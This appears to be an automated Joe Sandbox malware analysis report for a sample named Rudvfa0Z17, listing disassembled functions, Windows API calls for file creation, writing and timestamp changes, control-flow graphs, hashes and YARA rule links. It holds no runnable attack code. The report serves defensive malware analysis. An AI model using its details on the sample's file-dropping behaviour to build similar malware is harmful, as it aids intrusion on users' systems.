                                APIs
                                • __fassign.LIBCMT ref: 100093B4
                                • _memset.LIBCMT ref: 100093E8
                                • _memset.LIBCMT ref: 1000940C
                                • _strcat_s.LIBCMT ref: 10009427
                                • _sprintf.LIBCMT ref: 100094A8
                                • _sprintf.LIBCMT ref: 100094D0
                                • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 10009506
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,00000010,?,00000001), ref: 1000958F
                                • SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000010,?,00000001), ref: 100095DB
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000010,?,00000001), ref: 100095E7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$_memset_sprintf$CloseCreateHandleTimeWrite__fassign_strcat_s
                                • String ID: %s%s$:$\$text.e
                                • API String ID: 3001508280-2720340845
                                • Opcode ID: 20582db583dc861384ad0e058ba716e76712ca215dfc85956af61f11d696da3b
                                • Instruction ID: 73a716f2663df8b8e92aea41c103b71399f1627729841feff5178e0e12803359
                                • Opcode Fuzzy Hash: 20582db583dc861384ad0e058ba716e76712ca215dfc85956af61f11d696da3b
                                • Instruction Fuzzy Hash: CC91C171D00A289BFB61CB64CC85BDAB7B8EB09395F0001E6E618A7185D770AFC5CF90
                                Function 10002D0C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 111filesleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10002D4B
                                • _memset.LIBCMT ref: 10002D74
                                • Sleep.KERNEL32(00000001), ref: 10002D94
                                • _malloc.LIBCMT ref: 10002DCE
                                • _memset.LIBCMT ref: 10002DFB
                                • WriteFile.KERNEL32(?,00000000,1F400000,?,00000000), ref: 10002E13
                                • _free.LIBCMT ref: 10002E1A
                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10002E42
                                • FlushFileBuffers.KERNEL32(?), ref: 10002E4E
                                • CloseHandle.KERNEL32(?), ref: 10002E5A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$Write_memset$BuffersCloseCreateFlushHandleSleep_free_malloc
                                • String ID: cef.dll$lib
                                • API String ID: 1923221151-1944707463
                                • Opcode ID: ca01e0c2fb6399795f82dae7e3f52f2be417b1a9fccd548e25d36cff5d7fbf62
                                • Instruction ID: 95ace9bfcda8c33f9a2fbc6e56799451f67ef5c6450e70c67937a253407d00e2
                                • Opcode Fuzzy Hash: ca01e0c2fb6399795f82dae7e3f52f2be417b1a9fccd548e25d36cff5d7fbf62
                                • Instruction Fuzzy Hash: 3E31B17190022CAFEB25DF24CC85FEAB7B9EB19340F0041E5F688A6150DAB19FC58F50
                                Function 100028B9 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 312fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 610 100028b9-10002a3d call 10010ab0 call 1000cce0 * 3 624 10002a5f-10002adb 610->624 625 10002a3f-10002a40 610->625 639 10002ae3-10002aff 624->639 640 10002add-10002ade 624->640 626 10002a46-10002a50 625->626 632 10002a58-10002a5a 626->632 634 10002cfd-10002d0b call 1000ad41 632->634 639->640 643 10002b01-10002b22 call 1000aa9e call 1000cce0 639->643 640->626 648 10002b28-10002b4f 643->648 650 10002b51-10002b57 648->650 651 10002b59-10002b60 648->651 650->648 650->651 652 10002b62-10002b6e call 1000b8a1 651->652 653 10002b73-10002b7d 651->653 652->640 655 10002b8c-10002b90 653->655 656 10002b7f-10002b8a 653->656 657 10002b96-10002ba0 call 1000aa9e 655->657 658 10002c8d-10002cdd CreateFileA WriteFile FlushFileBuffers CloseHandle call 1000b8a1 655->658 656->652 656->655 662 10002ba5-10002bd9 call 10013660 call 10002887 657->662 663 10002ce2-10002cfb 658->663 670 10002bdb 662->670 671 10002bff 662->671 663->634 673 10002bdd-10002be9 670->673 674 10002c02-10002c05 671->674 675 10002bf1-10002bf4 673->675 676 10002beb-10002bef 673->676 674->632 677 10002c0b-10002c14 674->677 675->674 679 10002bf6-10002bfd 675->679 676->673 676->675 678 10002c1a-10002c1f 677->678 678->678 680 10002c21-10002c45 call 1000cce0 678->680 679->670 679->671 683 10002c48-10002c4d 680->683 683->683 684 10002c4f-10002c8a call 10013660 call 10002887 call 10013660 683->684 684->658
                                APIs
                                • _memset.LIBCMT ref: 10002908
                                • _memset.LIBCMT ref: 1000291A
                                • _memset.LIBCMT ref: 10002929
                                • _memset.LIBCMT ref: 10002B1A
                                • _memset.LIBCMT ref: 10002C37
                                • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000001,00000000), ref: 10002CA0
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10002CC3
                                • FlushFileBuffers.KERNEL32(00000000), ref: 10002CCA
                                • CloseHandle.KERNEL32(00000000), ref: 10002CD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: _memset$File$BuffersCloseCreateFlushHandleWrite
                                • String ID: <
                                • API String ID: 2144675991-4251816714
                                • Opcode ID: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                • Instruction ID: a1f269842447a9dcddcd4be163bf2b0c8b7a3912157e6269aeea71cf59aacecc
                                • Opcode Fuzzy Hash: 7483a2a04af1c0fb4a5dd35ee18b4b198e80d501588293fbf89c89882791b19e
                                • Instruction Fuzzy Hash: D5C1CB76900228AFEB21DF648C85DEABBFDEB09394F14C1E6F509A2150DB319F858F54
                                Function 0054D874 Relevance: 16.6, APIs: 11, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 691 54d874-54d895 EnterCriticalSection 692 54d8a4-54d8a9 691->692 693 54d897-54d89e 691->693 695 54d8c6-54d8ce 692->695 696 54d8ab-54d8ae 692->696 693->692 694 54d962-54d965 693->694 700 54d967-54d96a 694->700 701 54d96d-54d98b LeaveCriticalSection 694->701 697 54d8e5-54d909 GlobalHandle GlobalUnlock call 53751a GlobalReAlloc 695->697 698 54d8d0-54d8e3 call 53751a GlobalAlloc 695->698 699 54d8b1-54d8b4 696->699 708 54d90f-54d911 697->708 698->708 704 54d8b6-54d8bc 699->704 705 54d8be-54d8c0 699->705 700->701 704->699 704->705 705->694 705->695 709 54d936-54d95f GlobalLock call 63c6d0 708->709 710 54d913-54d918 708->710 709->694 711 54d928-54d931 LeaveCriticalSection call 538190 710->711 712 54d91a-54d922 GlobalHandle GlobalLock 710->712 711->709 712->711
                                APIs
                                • EnterCriticalSection.KERNEL32(0073A27C,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D887
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D8DD
                                • GlobalHandle.KERNEL32(0084FF10), ref: 0054D8E6
                                • GlobalUnlock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D8F0
                                • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 0054D909
                                • GlobalHandle.KERNEL32(0084FF10), ref: 0054D91B
                                • GlobalLock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D922
                                • LeaveCriticalSection.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D92B
                                • GlobalLock.KERNEL32(00000000,?,?,?,0073A260,0073A260,?,0054DCAF,00000004,00544579,005381E4,005382F8,0040E0F1), ref: 0054D937
                                • _memset.LIBCMT ref: 0054D951
                                • LeaveCriticalSection.KERNEL32(00000000,3F7259E2), ref: 0054D97F
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                • String ID:
                                • API String ID: 496899490-0
                                • Opcode ID: 701c7f80717766588c49cf9b396544a02917dc2281a66726b9c9399b8a32ba4c
                                • Instruction ID: 4fc896e0dd397aeb12eaef14b211f37fd946bb1472f086b6f8352429243eca4a
                                • Opcode Fuzzy Hash: 701c7f80717766588c49cf9b396544a02917dc2281a66726b9c9399b8a32ba4c
                                • Instruction Fuzzy Hash: 9B31AF71A00706AFD7249F74CC8DA9ABBFAFF84704F014929F556D7260EB31E9408B60
                                Function 1000916F Relevance: 10.6, APIs: 7, Instructions: 114COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 716 1000916f-1000918c 717 100091ee-100091f2 716->717 718 1000918e-100091a9 call 1000be5b 716->718 719 100091f8-100091fb 717->719 720 100092af-100092bc call 1000ad41 717->720 725 100091ac-100091b1 718->725 722 100091fd-100091ff 719->722 726 10009201-10009203 722->726 727 10009205 722->727 725->725 729 100091b3-100091b5 725->729 726->727 730 10009207-1000920c 726->730 727->730 731 100091b7-100091c3 729->731 732 100091cd-100091dd GetFileAttributesA 729->732 730->722 733 1000920e-10009210 730->733 734 100091c5-100091c8 731->734 735 100091ca 731->735 732->717 736 100091df-100091e8 CreateDirectoryA 732->736 737 10009212-10009237 call 10013660 call 1000916f 733->737 738 1000923a-10009244 733->738 734->732 734->735 735->732 736->717 737->738 739 10009246-10009258 call 1000be5b 738->739 740 1000925b-10009265 738->740 739->740 744 10009268-1000926d 740->744 744->744 747 1000926f-1000929e call 1000be5b GetFileAttributesA 744->747 747->720 751 100092a0-100092a9 CreateDirectoryA 747->751 751->720
                                APIs
                                • GetFileAttributesA.KERNEL32(?,?,0000000D,?), ref: 100091D4
                                • CreateDirectoryA.KERNEL32(?,00000000,?,0000000D,?), ref: 100091E8
                                • __fassign.LIBCMT ref: 1000919B
                                  • Part of subcall function 1000BE5B: __mbsnbcpy_l.LIBCMT ref: 1000BE6B
                                • __fassign.LIBCMT ref: 10009253
                                • __fassign.LIBCMT ref: 10009282
                                • GetFileAttributesA.KERNEL32(00000000,?,0000000D,?), ref: 10009295
                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,0000000D,?), ref: 100092A9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: __fassign$AttributesCreateDirectoryFile$__mbsnbcpy_l
                                • String ID:
                                • API String ID: 2854908881-0
                                • Opcode ID: 19ae208bd58dd0a62daa5c8630e2a55888f4f76b224036dc7dc1bf30700462e9
                                • Instruction ID: 5956e6d2c7f77d4cc5354552260656b707d8c1af4a1ca73f2dd12bb7e3efa789
                                • Opcode Fuzzy Hash: 19ae208bd58dd0a62daa5c8630e2a55888f4f76b224036dc7dc1bf30700462e9
                                • Instruction Fuzzy Hash: 5F4115B590428D6BEB50CB68CC88BEA7BEDDB05380F5101E5E994D3186DA709F88CB61
                                Function 1000A063 Relevance: 9.3, APIs: 6, Instructions: 301COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 752 1000a063-1000a0ba call 100142a0 call 1000a49f 757 1000a0bc 752->757 758 1000a0bf-1000a0c5 752->758 757->758 759 1000a0c7 758->759 760 1000a0ca-1000a0dd call 1000961c 758->760 759->760 763 1000a10d-1000a11a 760->763 764 1000a0df-1000a0e5 760->764 767 1000a11c 763->767 768 1000a11f-1000a122 763->768 765 1000a0e7 764->765 766 1000a0ea-1000a0f0 764->766 765->766 769 1000a0f2 766->769 770 1000a0f5-1000a108 wsprintfA 766->770 767->768 771 1000a124 768->771 772 1000a14e-1000a15e call 10008b91 768->772 769->770 774 1000a42c-1000a42f 770->774 775 1000a12e 771->775 772->775 780 1000a160-1000a172 call 100096c5 772->780 777 1000a431 774->777 778 1000a434-1000a49e OutputDebugStringA call 1000a566 call 10005af7 call 10005b32 call 10005af7 * 5 call 100142ea 774->778 779 1000a134-1000a13c 775->779 777->778 782 1000a400 call 10009f6b 779->782 783 1000a142-1000a143 call 1000972f 779->783 780->775 794 1000a174-1000a188 780->794 788 1000a405-1000a40c 782->788 791 1000a148-1000a149 783->791 792 1000a411-1000a428 wsprintfA 788->792 793 1000a40e 788->793 791->788 792->774 793->792 794->779 796 1000a18a-1000a1b9 call 1000b7e4 call 100096c5 794->796 806 1000a1c1-1000a1e7 call 10009fac 796->806 807 1000a1bb 796->807 813 1000a3f6-1000a3fb call 1000aa30 806->813 814 1000a1ed-1000a2b2 call 100059cb call 1000a4c9 call 1000a520 call 1000a605 call 10005af7 call 1000a520 call 1000a605 call 10005af7 806->814 807->806 813->782 838 1000a2b4 814->838 839 1000a2b7-1000a2bd 814->839 838->839 840 1000a2c2-1000a2c6 839->840 841 1000a2bf 839->841 842 1000a2e2-1000a2e4 840->842 843 1000a2c8-1000a2ca 840->843 841->840 846 1000a2e7-1000a2e9 842->846 844 1000a2cc-1000a2d2 843->844 845 1000a2de-1000a2e0 843->845 844->842 847 1000a2d4-1000a2dc 844->847 845->846 848 1000a385-1000a3b1 call 10005af7 * 3 846->848 849 1000a2ef-1000a2f2 846->849 847->840 847->845 865 1000a3b3-1000a3be call 1000b8df 848->865 866 1000a3bf-1000a3eb 848->866 849->848 851 1000a2f8-1000a2fe 849->851 853 1000a300 851->853 854 1000a303-1000a32c call 100059cb call 1000a59a 851->854 853->854 863 1000a331-1000a337 854->863 864 1000a32e 854->864 867 1000a339 863->867 868 1000a33c-1000a349 call 10009700 863->868 864->863 865->866 866->796 870 1000a3f1 866->870 867->868 873 1000a34e-1000a352 868->873 870->779 874 1000a354-1000a359 873->874 875 1000a377-1000a380 call 10005af7 873->875 874->875 876 1000a35b-1000a360 874->876 875->848 876->875 878 1000a362-1000a367 876->878 878->875 879 1000a369-1000a36e 878->879 879->875 880 1000a370 879->880 880->875
                                APIs
                                • __EH_prolog3_GS.LIBCMT ref: 1000A06D
                                • wsprintfA.USER32 ref: 1000A0FC
                                • wsprintfA.USER32 ref: 1000A41F
                                  • Part of subcall function 10008B91: __fassign.LIBCMT ref: 10008BA4
                                • _wprintf.LIBCMT ref: 1000A19B
                                • std::_Xinvalid_argument.LIBCPMT ref: 1000A3FB
                                • OutputDebugStringA.KERNEL32(?,?,?,?,?,?,10017380,000000FF), ref: 1000A435
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: wsprintf$DebugH_prolog3_OutputStringXinvalid_argument__fassign_wprintfstd::_
                                • String ID:
                                • API String ID: 2279894289-0
                                • Opcode ID: 5e606e6aa0a05db95cc5d0c86f9264e9bc89a53203d1eaa0600f78d532f15940
                                • Instruction ID: 15dd9eba096bb05e6903e10c230cd1e13f32cb1ae0f886c9acc3da2af926b47a
                                • Opcode Fuzzy Hash: 5e606e6aa0a05db95cc5d0c86f9264e9bc89a53203d1eaa0600f78d532f15940
                                • Instruction Fuzzy Hash: D9C16A7590425D9BEF12CFA4CC81ADDBBB8EF0A380F5142AAE909A7145D770AF85CF41
                                Function 00427FF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 921 427ff0-42805a call 63c6d0 call 53746d 926 428066-428090 call 53746d 921->926 927 42805c-428061 call 40e4a0 921->927 932 428092-428097 call 40e4a0 926->932 933 42809c-4280cd GetModuleFileNameW 926->933 927->926 932->933 936 4280d0-4280d9 933->936 936->936 937 4280db-428105 call 40e360 call 63b30a 936->937 942 428107-42810a 937->942 943 42810c-42810e 937->943 944 428110-42811f call 419560 942->944 943->944 946 428124-42814a call 40dbb0 944->946 949 428156-428169 946->949 950 42814c-428151 946->950 951 428175-428191 call 6388f0 949->951 952 42816b-428170 949->952 950->949 952->951
                                APIs
                                • _memset.LIBCMT ref: 00428044
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000000), ref: 004280BE
                                • _wcsrchr.LIBCMT ref: 004280FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.3259571591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.3259547600.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259790423.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259841468.0000000000724000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259859540.000000000072E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259878862.0000000000735000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259895985.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.3259912698.0000000000741000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FileModuleName_memset_wcsrchr
                                • String ID: Yr?
                                • API String ID: 3263482925-3814531584
                                • Opcode ID: 38174b6fb003b41db8f6ad2ddeb13373319d99544d60a7c3dd40589232e91f64
                                • Instruction ID: f5fdb4711c5cb80a5300a3031eb21cdb5188b502cb2df1d3aaf1cf00cc93d5ea
                                • Opcode Fuzzy Hash: 38174b6fb003b41db8f6ad2ddeb13373319d99544d60a7c3dd40589232e91f64
                                • Instruction Fuzzy Hash: 3741E571A002199FDB14DF68CC85BAEB7B8FF54314F1482AEE419E7291DB34AE458B84
                                Function 1000BD08 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • _malloc.LIBCMT ref: 1000BD22
                                  • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                  • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                  • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                • std::exception::exception.LIBCMT ref: 1000BD57
                                • std::exception::exception.LIBCMT ref: 1000BD71
                                • __CxxThrowException@8.LIBCMT ref: 1000BD82
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                • String ID:
                                • API String ID: 615853336-0
                                • Opcode ID: d95f4789413638b91aa84ecef32e181d789e58a5d6bfa65bce0fdfdeccd2f804
                                • Instruction ID: bd7f334f1e932a3e7b8b1a8aa2d400e353e82d7f1e8fab280da3017615532154
                                • Opcode Fuzzy Hash: d95f4789413638b91aa84ecef32e181d789e58a5d6bfa65bce0fdfdeccd2f804
                                • Instruction Fuzzy Hash: 5FF02838400A5EABFB04DF54CC42DED7BA5EB002D0F60052AF814EA0A5DF74EB868740
                                Function 100086D0 Relevance: 4.6, APIs: 3, Instructions: 127COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1079 100086d0-100086de 1080 100086e0 1079->1080 1081 100086e8-100086eb 1079->1081 1082 100086e2-100086e3 1080->1082 1081->1080 1083 100086ed-100086f0 1081->1083 1084 10008825-10008828 1082->1084 1085 100086f2-100086f7 call 10008a54 1083->1085 1086 100086f9-10008710 call 1000850d 1083->1086 1085->1086 1091 10008712-10008714 1086->1091 1092 10008716-10008726 call 1000b4cb 1086->1092 1091->1082 1095 10008728-10008746 call 1000b4cb 1092->1095 1096 1000874f-10008752 1092->1096 1100 10008757-10008781 1095->1100 1101 10008748-1000874e call 1000b491 1095->1101 1098 10008824 1096->1098 1098->1084 1103 100087a1-100087bd 1100->1103 1104 10008783-1000878f call 10007966 1100->1104 1101->1096 1107 100087c4 1103->1107 1108 100087bf-100087c2 1103->1108 1110 10008794-10008798 1104->1110 1109 100087c7-100087fa 1107->1109 1108->1109 1111 100087fc-10008803 1109->1111 1112 1000880f-10008822 1109->1112 1110->1103 1113 1000879a 1110->1113 1111->1112 1114 10008805-1000880d call 10007759 1111->1114 1112->1098 1113->1103 1114->1111 1114->1112
                                APIs
                                • _malloc.LIBCMT ref: 1000871C
                                  • Part of subcall function 1000B4CB: __FF_MSGBANNER.LIBCMT ref: 1000B4E4
                                  • Part of subcall function 1000B4CB: __NMSG_WRITE.LIBCMT ref: 1000B4EB
                                  • Part of subcall function 1000B4CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 1000B510
                                • _malloc.LIBCMT ref: 1000872D
                                • _free.LIBCMT ref: 10008749
                                  • Part of subcall function 1000B491: RtlFreeHeap.NTDLL(00000000,00000000,?,1000B064,?,?,1000101C), ref: 1000B4A7
                                  • Part of subcall function 1000B491: GetLastError.KERNEL32(?,?,1000B064,?,?,1000101C), ref: 1000B4B9
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: Heap_malloc$AllocateErrorFreeLast_free
                                • String ID:
                                • API String ID: 916394080-0
                                • Opcode ID: 9ff5967c5a77d9676775b1c5cc29b0c5f39e43de9f44d53c9d09c373247b1173
                                • Instruction ID: a00e60491e46dfd1ee58bbd4593486312fc2ca9a753c64ce6e520688288dc10f
                                • Opcode Fuzzy Hash: 9ff5967c5a77d9676775b1c5cc29b0c5f39e43de9f44d53c9d09c373247b1173
                                • Instruction Fuzzy Hash: 70415B75A04656EFEB55CF68C480598BBF8FF08780720419AE999DB74AD730EA50CFD0
                                Function 10007FB6 Relevance: 4.6, APIs: 3, Instructions: 113COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1117 10007fb6-10007fcf call 10007e17 1120 10007fd1-10007fd4 1117->1120 1121 10007fd9-10007fdc 1117->1121 1122 100080e3-100080e6 1120->1122 1123 10007fde-10007fe2 1121->1123 1124 10007fff 1121->1124 1126 10007fe4-10007ff7 SetFilePointer 1123->1126 1127 10007ff9-10007ffd 1123->1127 1125 10008002 1124->1125 1128 10008005-10008012 1125->1128 1126->1125 1127->1128 1129 10008014 1128->1129 1130 10008017-10008029 call 1000b4cb 1128->1130 1129->1130 1133 10008033-1000803d 1130->1133 1134 1000802b-1000802e 1130->1134 1136 10008043 1133->1136 1137 100080d6-100080e1 call 1000b491 1133->1137 1135 100080e2 1134->1135 1135->1122 1139 1000804d-1000805a 1136->1139 1137->1135 1141 1000805c 1139->1141 1142 1000805f-1000806b 1139->1142 1141->1142 1143 1000806d 1142->1143 1144 1000806f-1000807d call 10007e17 1142->1144 1143->1144 1144->1137 1147 1000807f-10008088 call 10007e76 1144->1147 1149 1000808d-10008093 1147->1149 1149->1137 1150 10008095-10008098 1149->1150 1151 100080b9-100080bb 1150->1151 1152 1000809a-100080a2 1151->1152 1153 100080bd 1151->1153 1152->1151 1154 100080a4-100080a9 1152->1154 1155 100080c4-100080c8 1153->1155 1154->1151 1156 100080ab-100080b0 1154->1156 1155->1137 1157 100080ca-100080d0 1155->1157 1156->1151 1158 100080b2-100080b7 1156->1158 1157->1137 1159 10008045-10008048 1157->1159 1158->1151 1160 100080bf-100080c1 1158->1160 1159->1139 1160->1155
                                APIs
                                  • Part of subcall function 10007E17: SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000002,10007FCD,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007E43
                                • SetFilePointer.KERNEL32(FA83E855,00000000,00000000,00000001,?,00000000,?,?,?,10008124,?,00000140,00000000,00000000), ref: 10007FEE
                                • _malloc.LIBCMT ref: 1000801E
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: FilePointer$_malloc
                                • String ID:
                                • API String ID: 3040784002-0
                                • Opcode ID: b201b2cbd970e2b698aa026e71b7937ac5f18c2142fedf9cda4a911ccf216a12
                                • Instruction ID: e9e65de8990a35600aa63ecf93a5fe2b6943994b54ace195112ba4e3cbd13dc3
                                • Opcode Fuzzy Hash: b201b2cbd970e2b698aa026e71b7937ac5f18c2142fedf9cda4a911ccf216a12
                                • Instruction Fuzzy Hash: BC41E170E0024AAFFB50DAA4C845B5EBBF1FF043D4F11816AEA54E7289E7759F488B40
                                Function 10002E6F Relevance: 4.6, APIs: 3, Instructions: 68fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 10002E8B
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 10002E96
                                  • Part of subcall function 1000AA9E: _malloc.LIBCMT ref: 1000BD22
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 10002EB1
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$CreateReadSize_malloc
                                • String ID:
                                • API String ID: 1520594064-0
                                • Opcode ID: a95b2213d73165cd3d6775a3d50b751076bb32b1058e07c2771ba57d7c97f6cb
                                • Instruction ID: 68624f3e933efa91eaa5f7396baae24bc5eaf6790c19fd373594060868047bb5
                                • Opcode Fuzzy Hash: a95b2213d73165cd3d6775a3d50b751076bb32b1058e07c2771ba57d7c97f6cb
                                • Instruction Fuzzy Hash: 4E1156756001287AFB11AF61DCC9EEB3F6CEF466E0F008125F909A6156DA70AE45C7F0
                                Function 10007D6B Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000141,00000141,?,10008B63,?,?), ref: 10007D8C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,00000140,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10007DB0
                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000020,?,1000965A,?,00000004,1000A0D1,?,?,00000334,1000439D,?), ref: 10007DE5
                                Memory Dump Source
                                • Source File: 00000000.00000002.3261197301.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10001000_Rudvfa0Z17.jbxd
                                Similarity
                                • API ID: File$Pointer$Create
                                • String ID:
                                • API String ID: 250661774-0
                                • Opcode ID: 728afc4fb06e335d4fafcc7d92433849b5f48e6cfbb3e06e1ad6d3530bb74562
                                • Instruction ID: 4f656ac9fc5f2f06108f91d7ec9c633ab968d44dc8153898d38ee8b8eb82a3a9
                                • Opcode Fuzzy Hash: 728afc4fb06e335d4fafcc7d92433849b5f48e6cfbb3e06e1ad6d3530bb74562
